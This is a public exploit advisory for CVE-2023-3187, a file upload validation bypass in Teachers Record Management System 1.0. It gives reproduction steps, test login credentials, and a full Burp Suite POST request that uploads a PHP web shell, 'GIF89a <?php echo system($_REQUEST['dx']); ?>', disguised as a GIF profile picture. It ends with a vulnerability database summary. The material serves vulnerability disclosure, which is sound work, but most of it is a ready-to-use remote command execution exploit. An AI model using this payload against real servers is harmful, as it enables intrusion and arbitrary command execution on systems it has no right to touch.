Teachers Record Management System 1.0 Validation Bypass
Teachers Record Management System version 1.0 suffers from a file upload validation bypass vulnerability.
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
Exploit Author: AFFAN AHMED
Vendor Homepage: https://phpgurukul.com
Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE: CVE-2023-3187

===============================
STEPS_TO_REPRODUCE
===============================

1. Log in to the teacher account with the credentials "Username: [email protected]", "Password: Test@123".
2. Navigate to the Profile section and edit the profile picture by clicking on Edit Image.
3. Open Burp Suite and intercept the Edit Image request.
4. In the POST request, change the **Filename** from "profile picture.png" to "profile picture.php.gif".
5. Change the **Content-Type** from "image/png" to "image/gif".
6. Add this **Payload**: `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. **GIF89a is the GIF magic-byte signature; prepending it bypasses the file upload extension check.**
8. Below is the Burp Suite POST request with all the changes I made above.

==========================================
BURPSUITE_REQUEST
==========================================

```http
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--
```

===============================
PROOF_OF_CONCEPT
===============================

GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
Related news
CVE-2023-3187: Vulnerability/trms.md at main · ctflearner/Vulnerability
A vulnerability, which was classified as critical, has been found in PHPGurukul Teachers Record Management System 1.0. Affected by this issue is some unknown functionality of the file /changeimage.php of the component Profile Picture Handler. The manipulation of the argument newpic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231176.